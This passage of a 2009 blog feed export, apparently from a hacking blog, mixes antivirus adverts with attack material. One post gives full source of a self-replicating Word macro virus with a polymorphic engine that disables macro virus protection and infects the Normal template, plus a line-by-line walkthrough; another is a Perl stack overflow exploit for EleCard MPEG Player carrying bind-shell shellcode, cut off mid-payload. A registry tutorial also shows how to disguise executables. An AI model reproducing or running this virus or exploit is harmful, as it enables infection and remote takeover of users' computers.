root out all manner of malicious software, no matter how stealthy it may be.&lt;br /&gt;&lt;br /&gt;You didn't buy your computer to worry about security. So let AVG Internet Security do the worrying for you while you get on with your online life.&lt;br /&gt;Tailor AVG just for you&lt;br /&gt;&lt;br /&gt;AVG's System Tools let you easily configure your privacy settings, connections, and browser plug-ins all in one place.&lt;br /&gt;The best Windows protection - trusted by millions of users&lt;br /&gt;&lt;br /&gt;AVG's award-winning antivirus technology protects more than 80 million users and is certified by major antivirus testing organizations (VB100%, ICSA, West Coast Labs Checkmark). View all AVG awards &amp; certifications&lt;br /&gt;No hidden costs&lt;br /&gt;&lt;br /&gt;When you purchase an AVG product, everything you need is included in the price for the full license duration - technical support, virus updates, and new program versions. All users of paid AVG products also qualify for generous discounts on subscription renewals and product upgrades.&lt;br /&gt;Flexible licensing&lt;br /&gt;AVG Internet Security can be purchased online in license packs for 1-10 computers.&lt;br /&gt;One or two year subscriptions available. More info, &lt;a href="http://www.avg.com/product-avg-internet-security" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1715491054129393789?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1715491054129393789'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1715491054129393789'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/03/avg-internet-security-85.html' title='AVG Internet Security 8.5'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-2336935487271167085</id><published>2009-03-23T09:56:00.001+07:00</published><updated>2009-03-23T10:19:22.962+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutorial'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Make New Extension Executable File</title><content type='html'>Such as we know windows only recognizing some file type fruits executable newly, that is the file exe, com, scr, and pif. How if we will make extension file executable newly, for example extension ext( for example his file name : Anti. ext and nature of his file be like file Anti.exe). Usefulness of this technique is so that black out the program to file exe, scr, and com can be overcome. So that if file exe be like msconfig.exe blacked out because extension exe, hence we fixed can run the program msconfig the by changing extension, for example becoming msconfig.ext&lt;br /&gt;&lt;br /&gt;To make the matter be like this easy very, we are only require to enter key newly into registry, for example extension ext which be like file exe, hence file reg yg enterred is :&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;span style="font-style:italic;"&gt;[ HKEY_CLASSES_ROOT\.EVA]&lt;br /&gt;@=" exefile"&lt;br /&gt;&lt;br /&gt;Become his format is :&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;[ HKEY_CLASSES_ROOT\.EKSTENSIBARU]&lt;br /&gt;@=" exefile" to  be like file exe&lt;br /&gt;@=" scrfile" to  be like file scr&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Is while to be like file com, hence have to be entered also in file regi  key PersistentHandler This technique can is also used by virus to system his defence in computer, that is with :&lt;br /&gt;&lt;br /&gt;. 1. Change handling of file dangerous, for example binding file jpg exefile, whereas virus file fixed fasten ( join forces) file jpg in fact, without changing extension file, is while substitution extension for file draw jpg is extension will different, for example tmp&lt;br /&gt;&lt;br /&gt;. 2. Incognito to become the file which similar with file undangerous so that difficult detected for example virus for file extension d11 at first sight look like with dll ekstensi etc.&lt;br /&gt;&lt;br /&gt;Note :&lt;br /&gt;&lt;br /&gt;To alter, for example file scr  before all use the program wafting icon alone, we wish the file scr use the icon from outside, for example property windows without compiling again file scr, hence we require to changing value registry, at key :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;[ HKEY_CLASSES_ROOT\SCRFILE]&lt;br /&gt;that is in :&lt;br /&gt;Value DefaultIcon from % 1 becoming, for example :: % Systemroot%\System32\Shell32.Dll,-154&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-2336935487271167085?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2336935487271167085'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/2336935487271167085'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/03/make-new-extension-executable-file.html' title='Make New Extension Executable File'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-1498647995690409151</id><published>2009-02-02T20:31:00.000+07:00</published><updated>2009-02-02T20:33:23.376+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Virus'/><title type='text'>Anti Keylogger</title><content type='html'>The threat: Keyloggers as means of stealing information.&lt;br /&gt;&lt;br /&gt;Information stealing exists since early days of the World Wide Web. Unfortunately, various kinds of white-collar crime aimed at stealing valuable (in the direct sense) information thrive in cyberspace. The scale of these crimes varies from harvesting email addresses for spammers to identity theft and espionage.&lt;br /&gt;&lt;br /&gt;Since the Internet has become a part of daily life and business, rapid growth of cybercrime endangers the whole society. Information-stealing software certainly facilitate these crimes, sometimes being the only instrument a thief needs to commit them.&lt;br /&gt;&lt;br /&gt;Real protection starts with identifying the threat.  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;One of the most effective ways of stealing information is capturing keystrokes. A small, fairly simple program (a programmer can write a plain one in a couple of days) captures everything the user is doing - keystrokes, mouse clicks, files opened and closed, sites visited. A little more sophisticated programs of this kind also capture text from windows and make screenshots (record everything displayed on the screen) - so the information is captured even if the user doesn't type anything, just opens the views the file. These programs are called Keylogging Programs (keyloggers, key loggers, keystroke loggers, key recorders, key trappers, key capture programs, etc.) They form the most dangerous core of so-called spyware.&lt;br /&gt;&lt;br /&gt;Old keyloggers become obsolete. New keyloggers appear all the time. Existing keylogging programs are constantly modernized. It is extremely likely that several keyloggers are being written at this very moment.&lt;br /&gt;&lt;br /&gt;Means of defense: Anti-spyware, anti-viruses and personal firewalls&lt;br /&gt;&lt;br /&gt;Experts recommend to use a combination of three products: a personal firewall, an anti-virus and an anti-spyware - and regularly update the latter two. However, even in this case a computer won't be 100% secure against keyloggers. Why?&lt;br /&gt;&lt;br /&gt;Most anti-spy and anti-virus products, whatever their names are and whatever their advertising says, apply the same scheme - pattern matching. These programs scan the system, looking for code that matches signatures - pieces of spyware code, which are kept in so-called signature bases. These products can protect from spyware which has already been detected and studied before. This approach makes anti-spyware developers inevitably lag behind spyware writers. Without frequent updating anti-spy products lose their efficiency very quickly. It can become very risky because the PC owner still relies on his anti-spy or anti-virus.&lt;br /&gt;&lt;br /&gt;Unfortunately, no signature base is complete enough to guarantee total protection. Even if the base is updated regularly, if this spyware signature is not included there - the anti-spy software is helpless against it. Anti-spies do not recognize every spyware product, when it is brand-new, for some time - until its signature is included into the bases and users update their anti-spies. There also are kinds of spy software which signatures are unlikely to be included into any signature base. For example, spy software can be developed by government organizations for their own purposes. Some commercial, especially corporate, monitoring products are very rarely included into signature bases, though many of them can well be used for spying as well.&lt;br /&gt;&lt;br /&gt;Another case - when there is only one copy of spy program. It doesn't take too long for a good programmer to write one. Spyware, just like clothes, can be "tailor-made". Hackers often take source codes of spy software from the Internet change them a bit and then compile something new, which no signature base will recognize.&lt;br /&gt;&lt;br /&gt;When a keylogging module is the part of a virus, it can cause lots of trouble, because several hours or even days will pass until it is included into signature bases.&lt;br /&gt;&lt;br /&gt;A problem with a personal firewall is that it asks too many questions. Even an experienced user can answer them incorrectly and allow some information-stealing program or module do its job. For example, some commercial monitoring programs use processes of programs with access to the Internet (browsers, mail clients, etc.) As a result, if the anti-virus overlooks a keylogger, valuable information can be stolen and sent via the Internet to the address specified by the hacker (or some other person). &lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Anti-keylogger™ is a dedicated anti-keylogging product. Unlike most other anti-spyware, Anti-keylogger doesn't depend on signature bases - just because it doesn't use them. The newly developed solutions and algorithms allow it to spot behavior of a spy program - and disable it instantly.&lt;br /&gt;&lt;br /&gt;Anti-keylogger™ can protect against even "custom-made" software keyloggers, which are extremely dangerous - and very popular with cybercriminals.&lt;br /&gt;&lt;br /&gt;Anti-keylogger™ is very user-friendly. It runs at the background, quite transparently for the user. It won't ask you needless questions; nor it will distract you from your work.&lt;br /&gt;&lt;br /&gt;Easy-to-use and reliable, Anti-keylogger™will guard your privacy and guarantee that all your confidential information remains secret. &lt;br /&gt;&lt;br /&gt;For more information detail, &lt;a href="http://www.anti-keyloggers.com/" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-1498647995690409151?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1498647995690409151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/1498647995690409151'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/02/anti-keylogger.html' title='Anti Keylogger'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-5210589003155581719</id><published>2009-02-02T20:22:00.001+07:00</published><updated>2009-02-02T20:25:18.588+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='VB'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>The polymorphic engine for VBA</title><content type='html'>This engine is a combination of both a class infector and a polymorphic engine. The whole thing is called 'bliem' like the virus I first used this engine in. Let's say something about the technic...&lt;br /&gt;&lt;br /&gt;The most bad thing about the already existing polymorphic engines for vba was that the always inserted the code at the same lines or the volume of the source code growed and growed and ... So 'bliem' doesn't have such problems. The main good thing in 'bliem' is that it always 'keeps an eye' on the actually size of the source code and reduces it when it's too big. Let's say something about the technic of inserting the junkcode: The junkcode is inserted into the viruscode not in the common way. The junkcode is inserted while infection. This means that the whole viruscode is stored in arrays and the junkcode is stored in some of this arrays. Like the main code is stored there, also junkcode is also there and will be inserted while infecting the &lt;br /&gt;new class object. While inserting the actual code into arrays, the 'bliem brain' is checking for the actually size of itself and if its too big, it deletes some junk arrays. I use this method because the old one with the command '.deletelines' only screwed up the code.&lt;br /&gt;&lt;br /&gt;To make 'bliem' work you have to insert a comment sign ( ' ) in the end of every code line. 'bliem' uses this for finding the junkcode in the normal virus code. Without this signs the virus and the polymorphic engine won't work.&lt;br /&gt;&lt;br /&gt;So 'bliem' is infector and polymorphic engine in one, so don't wonder about the code. If you have any questions or whatever, feel free and mail me!&lt;br /&gt;&lt;br /&gt;!This is only the distribution code. Original code uses shorter variable names!&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;Private Sub document_open() '&lt;br /&gt;Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '&lt;br /&gt;Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '&lt;br /&gt;Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '&lt;br /&gt;Set newhost = skip.VBProject.VBComponents(1).CodeModule '&lt;br /&gt;For y = 1 To Int(75 - (Rnd * 20)): vx = vx &amp; Chr(255 - Int(Rnd * 100)): Next y '&lt;br /&gt;vcode = "Private Sub document_close()" &amp; this &amp; vx &amp; vbCr '&lt;br /&gt;If MacroContainer = NormalTemplate Then '&lt;br /&gt;Set skip = ActiveDocument '&lt;br /&gt;Set newhost = skip.VBProject.VBComponents(1).CodeModule '&lt;br /&gt;vcode = "Sub document_open()" &amp; this &amp; vx &amp; vbCr '&lt;br /&gt;End If: Randomize: lines_ = host.countoflines '&lt;br /&gt;For i = 2 To lines_ '&lt;br /&gt;junkcode = "" '&lt;br /&gt;dis = Int(Rnd * 3) '&lt;br /&gt;pos = InStr(host.Lines(i, 1), this) '&lt;br /&gt;If pos = 0 Then GoTo end_ '&lt;br /&gt;If pos = 2 And lines_ &gt; 100 Then '&lt;br /&gt;virus(i) = "": dis = 1: GoTo next_ '&lt;br /&gt;End If '&lt;br /&gt;virus(i) = Left(host.Lines(i, 1), (pos - 1)) '&lt;br /&gt;For j = 1 To Int(75 - (Rnd * 20))  '&lt;br /&gt;junkcode = junkcode &amp; Chr(255 - Int(Rnd * 100)) '&lt;br /&gt;Next j '&lt;br /&gt;virus(i) = virus(i) &amp; this &amp; junkcode '&lt;br /&gt;If dis = 2 Then virus(i) = virus(i) &amp; vbCr &amp; Chr(32) &amp; this &amp; junkcode '&lt;br /&gt;vcode = vcode &amp; virus(i) &amp; vbCr '&lt;br /&gt;next_: '&lt;br /&gt;Next i '&lt;br /&gt;end_: '&lt;br /&gt;If newhost.countoflines &lt; 2 Then '&lt;br /&gt;newhost.AddFromString vcode '&lt;br /&gt;skip.Save '&lt;br /&gt;End If '&lt;br /&gt;End Sub '&lt;br /&gt;If Day(Now()) = 31 Then msbox virus(1) '&lt;br /&gt;Rem Another virus by Jack Twoflower [LineZer0 &amp; Metaphase] '&lt;br /&gt;Rem Uses "bliem" polymorhic engine by Jack Twoflower '&lt;br /&gt;&lt;br /&gt;I'll walk now through the code...&lt;br /&gt;&lt;br /&gt;&gt; Attention. The whole engine needs this " ' " signs after every&lt;br /&gt;&gt; line of code.&lt;br /&gt;&lt;br /&gt;Private Sub document_open() '&lt;br /&gt;Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '&lt;br /&gt;&lt;br /&gt;&gt; Dim the arrays. We need about 150 coz in this array the whole virus&lt;br /&gt;&gt; code will be stored. Turn off Virusprotection...&lt;br /&gt;&lt;br /&gt;Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '&lt;br /&gt;Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '&lt;br /&gt;&lt;br /&gt;&gt; Set here our current host&lt;br /&gt;&lt;br /&gt;For y = 1 To Int(75 - (Rnd * 20)): vx = vx &amp; Chr(255 - Int(Rnd * 100)): Next y '&lt;br /&gt;&lt;br /&gt;&gt; Create junk code for the engine&lt;br /&gt;&lt;br /&gt;vcode = "Private Sub document_close()" &amp; this &amp; vx &amp; vbCr '&lt;br /&gt;&lt;br /&gt;&gt; This will be our first line of code...&lt;br /&gt;&lt;br /&gt;If MacroContainer = NormalTemplate Then '&lt;br /&gt;Set skip = ActiveDocument '&lt;br /&gt;vcode = "Sub document_open()" &amp; this &amp; vx &amp; vbCr '&lt;br /&gt;End If: Randomize: lines_ = host.countoflines '&lt;br /&gt;&lt;br /&gt;&gt; If we are here in the Normaltemplate then exchange the hosts.&lt;br /&gt;&lt;br /&gt;Set newhost = skip.VBProject.VBComponents(1).CodeModule '&lt;br /&gt;&lt;br /&gt;&gt; Set the new host&lt;br /&gt;&lt;br /&gt;For i = 2 To lines_ '&lt;br /&gt;&lt;br /&gt;&gt; Here the 'brain' of the engine starts...&lt;br /&gt;&lt;br /&gt;junkcode = "" '&lt;br /&gt;&lt;br /&gt;&gt; Clear the variable every loop&lt;br /&gt;&lt;br /&gt;dis = Int(Rnd * 3) '&lt;br /&gt;&lt;br /&gt;&gt; Generate a random number for the engine&lt;br /&gt;&lt;br /&gt;pos = InStr(host.Lines(i, 1), this) '&lt;br /&gt;&lt;br /&gt;&gt; Get the position of the " ' " character in every line...&lt;br /&gt;&lt;br /&gt;If pos = 0 Then GoTo end_ '&lt;br /&gt;&lt;br /&gt;&gt; If there is no such sign goto end...&lt;br /&gt;&lt;br /&gt;If pos = 2 And lines_ &gt; 100 Then '&lt;br /&gt;&lt;br /&gt;&gt; The following code gets active if the size of the whole&lt;br /&gt;&gt; code is growing too big...it cuts the junkcode line out&lt;br /&gt;&gt; of the normal code...&lt;br /&gt;&lt;br /&gt;virus(i) = "": dis = 1: GoTo next_ '&lt;br /&gt;&lt;br /&gt;&gt; Clear this variable and goto next loop&lt;br /&gt;&lt;br /&gt;End If '&lt;br /&gt;virus(i) = Left(host.Lines(i, 1), (pos - 1)) '&lt;br /&gt;&lt;br /&gt;&gt; If the size is not too big, copy the normal code without&lt;br /&gt;&gt; the junkcode into the arrays...&lt;br /&gt;&lt;br /&gt;For j = 1 To Int(75 - (Rnd * 20))  '&lt;br /&gt;junkcode = junkcode &amp; Chr(255 - Int(Rnd * 100)) '&lt;br /&gt;Next j '&lt;br /&gt;&lt;br /&gt;&gt; Generate junkcode again...&lt;br /&gt;&lt;br /&gt;virus(i) = virus(i) &amp; this &amp; junkcode '&lt;br /&gt;&lt;br /&gt;&gt; Add the junkcode...&lt;br /&gt;&lt;br /&gt;If dis = 2 Then virus(i) = virus(i) &amp; vbCr &amp; Chr(32) &amp; this &amp; junkcode '&lt;br /&gt;&lt;br /&gt;&gt; If the 'dis' integer is 2 then add some junkcode lines into our code...&lt;br /&gt;&lt;br /&gt;vcode = vcode &amp; virus(i) &amp; vbCr '&lt;br /&gt;&lt;br /&gt;&gt; Add the whole code into 'vcode'&lt;br /&gt;&lt;br /&gt;next_: '&lt;br /&gt;Next i '&lt;br /&gt;&lt;br /&gt;&gt; Play it again Sam!&lt;br /&gt;&lt;br /&gt;end_: '&lt;br /&gt;If newhost.countoflines &lt; 2 Then '&lt;br /&gt;&lt;br /&gt;&gt; If there are 0 or 1 line in our newhost...&lt;br /&gt;&lt;br /&gt;newhost.AddFromString vcode '&lt;br /&gt;&lt;br /&gt;&gt; infect it...&lt;br /&gt;&lt;br /&gt;skip.Save '&lt;br /&gt;&lt;br /&gt;&gt; and save it...&lt;br /&gt;&lt;br /&gt;End If '&lt;br /&gt;If Day(Now()) = 31 Then msbox virus(1) '&lt;br /&gt;&lt;br /&gt;&gt; little payload...&lt;br /&gt;&lt;br /&gt;End Sub '&lt;br /&gt;Rem Another virus by jack twoflower [LineZer0 &amp; Metaphase] '&lt;br /&gt;Rem Uses "bliem" polymorhic engine by jack twoflower '&lt;br /&gt;&lt;br /&gt;ref. &lt;a href="http://vx.netlux.org/lib/vjt04.html"&gt;VX Heavens&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-5210589003155581719?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5210589003155581719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/5210589003155581719'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/02/polymorphic-engine-for-vba.html' title='The polymorphic engine for VBA'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-22145392675200750</id><published>2009-01-26T10:48:00.003+07:00</published><updated>2009-01-26T11:00:10.056+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Security'/><title type='text'>Acunetix Web Vulnerability Scanner</title><content type='html'>Why You Need To Secure Your Web Applications&lt;br /&gt;Website security is possibly today's most overlooked aspect of securing the&lt;br /&gt;enterprise and should be a priority in any organization.&lt;br /&gt;Increasingly, hackers are concentrating their efforts on web-based&lt;br /&gt;applications – shopping carts, forms, login pages, dynamic content, etc.&lt;br /&gt;Accessible 24/7 from anywhere in the world, insecure web applications&lt;br /&gt;provide easy access to backend corporate databases and also allow hackers&lt;br /&gt;to perform illegal activities using the attacked sites. A victim’s website can be&lt;br /&gt;used to launch criminal activities such as hosting phishing sites or to transfer&lt;br /&gt;illicit content, while abusing the website’s bandwidth and making its owner&lt;br /&gt;liable for these unlawful acts.&lt;br /&gt;Hackers already have a wide repertoire of attacks that they regularly launch&lt;br /&gt;against organizations including SQL Injection, Cross Site Scripting, Directory&lt;br /&gt;Traversal Attacks, Parameter Manipulation (e.g., URL, Cookie, HTTP&lt;br /&gt;headers, HTML Forms), Authentication Attacks, Directory Enumeration and&lt;br /&gt;other exploits. Moreover, the hacker community is very close-knit; newly&lt;br /&gt;discovered web application intrusions are posted on a number of forums and&lt;br /&gt;websites known only to members of that exclusive group. Postings are&lt;br /&gt;updated daily and are used to propagate and facilitate further hacking.&lt;br /&gt;Web applications – shopping carts, forms, login pages, dynamic content, and&lt;br /&gt;other bespoke applications – are designed to allow your website visitors to&lt;br /&gt;retrieve and submit dynamic content including varying levels of personal and&lt;br /&gt;sensitive data.&lt;br /&gt;If these web applications are not secure, then your entire database of&lt;br /&gt;sensitive information is at serious risk. A Gartner Group study reveals that&lt;br /&gt;75% of cyber attacks are done at the web application level.&lt;br /&gt;Download Acunetix Web Vulnerability&lt;br /&gt;Scanner manual, &lt;a href="http://www.ziddu.com/download/3298358/wvs6manual.rar.html" target="_blank"&gt;click here&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;Why does this happen?&lt;br /&gt;&lt;br /&gt;    ·  Websites and related web applications must be available 24 hours a&lt;br /&gt;       day, 7 days a week to provide the required service to customers,&lt;br /&gt;       employees, suppliers and other stakeholders.&lt;br /&gt;    ·  Firewalls and SSL provide no protection against web application&lt;br /&gt;       hacking, simply because access to the website has to be made&lt;br /&gt;       public.&lt;br /&gt;    ·  Web applications often have direct access to backend data such as&lt;br /&gt;       customer databases and, hence, control valuable data and are much&lt;br /&gt;       more difficult to secure.&lt;br /&gt;    ·  Most web applications are custom-made and, therefore, involve a&lt;br /&gt;       lesser degree of testing than off-the-shelf software. Consequently,&lt;br /&gt;       custom applications are more susceptible to attack.&lt;br /&gt;&lt;br /&gt;Various high-profile hacking attacks have proven that web application&lt;br /&gt;security remains the most critical. If your web applications are compromised,&lt;br /&gt;hackers will have complete access to your backend data even though your&lt;br /&gt;firewall is configured correctly and your operating system and applications&lt;br /&gt;are patched repeatedly. &lt;br /&gt;Network security defense provides no protection against web application&lt;br /&gt;attacks since these are launched on port 80 (default for websites) which has&lt;br /&gt;to remain open to allow regular operation of the business.&lt;br /&gt;For the most comprehensive security strategy, it is therefore imperative that&lt;br /&gt;you regularly and consistently audit your web applications for exploitable&lt;br /&gt;vulnerabilities.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2211767872603727128-22145392675200750?l=source-x.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/22145392675200750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2211767872603727128/posts/default/22145392675200750'/><link rel='alternate' type='text/html' href='http://source-x.blogspot.com/2009/01/acunetix-web-vulnerability-scanner.html' title='Acunetix Web Vulnerability Scanner'/><author><name>buzz</name><uri>http://www.blogger.com/profile/16344231548880076715</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2211767872603727128.post-3629761739387648518</id><published>2009-01-26T10:38:00.001+07:00</published><updated>2009-01-26T10:48:38.953+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit'/><title type='text'>EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit</title><content type='html'>#!/usr/bin/perl&lt;br /&gt;# By ALpHaNiX&lt;br /&gt;# NullArea.Net&lt;br /&gt;# THanks&lt;br /&gt;#EAX 00000000&lt;br /&gt;#ECX 41414141&lt;br /&gt;#EDX 775A104D&lt;br /&gt;#EBX 00000000&lt;br /&gt;#ESP 0012C280&lt;br /&gt;#EBP 0012C2A0&lt;br /&gt;#ESI 00000000&lt;br /&gt;#EDI 00000000&lt;br /&gt;#EIP 41414141&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;system("color 5");&lt;br /&gt;&lt;br /&gt;if (@ARGV != 1) { &amp;help; exit(); }&lt;br /&gt;&lt;br /&gt;sub help(){&lt;br /&gt;       print "[X] Usage : ./exploit.pl filename \n";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;{ $file = $ARGV[0]; }&lt;br /&gt;print "\n [X]*************************************************\n";&lt;br /&gt;print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";&lt;br /&gt;print " [X]        Coded By AlpHaNiX                        *\n";&lt;br /&gt;print " [X]         From Null Area [NullArea.Net]           *\n";&lt;br /&gt;print " [X]**************************************************\n\n";&lt;br /&gt;&lt;br /&gt;print "[+] Exploiting.....\n" ;&lt;br /&gt;&lt;br /&gt;my $buff="http://"."\x41" x 969 ;&lt;br /&gt;my $nop ="\x90" x 6000 ;&lt;br /&gt;my $ret ="\xB3\x37\x8D\x6E"  ; #  JMP ESP In DDRAW.Dll In Windows&lt;br /&gt;Vista Ultimate English&lt;br /&gt;&lt;br /&gt;# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum&lt;br /&gt;http://metasploit.com&lt;br /&gt;my $shellcode =&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".&lt;br /&gt;"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".&lt;br /&gt;"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".&lt;br /&gt;"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".&lt;br /&gt;"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".&lt;br /&gt;"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".&lt;br /&gt;"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".&lt;br /&gt;"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".&lt;br /&gt;"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".&lt;br /&gt;"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".&lt;br /&gt;"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".&lt;br /&gt;"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".&lt;br /&gt;"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".&lt;br /&gt;"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".&lt;br /&gt;"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".&lt;br /&gt;"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".&lt;br /&gt;"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".&lt;br /&gt;"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".&lt;br /&gt;"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".&lt;br /&gt;"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".&lt;br /&gt;"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".&lt;br /&gt;"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".&lt;br /&gt;"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".&lt;br 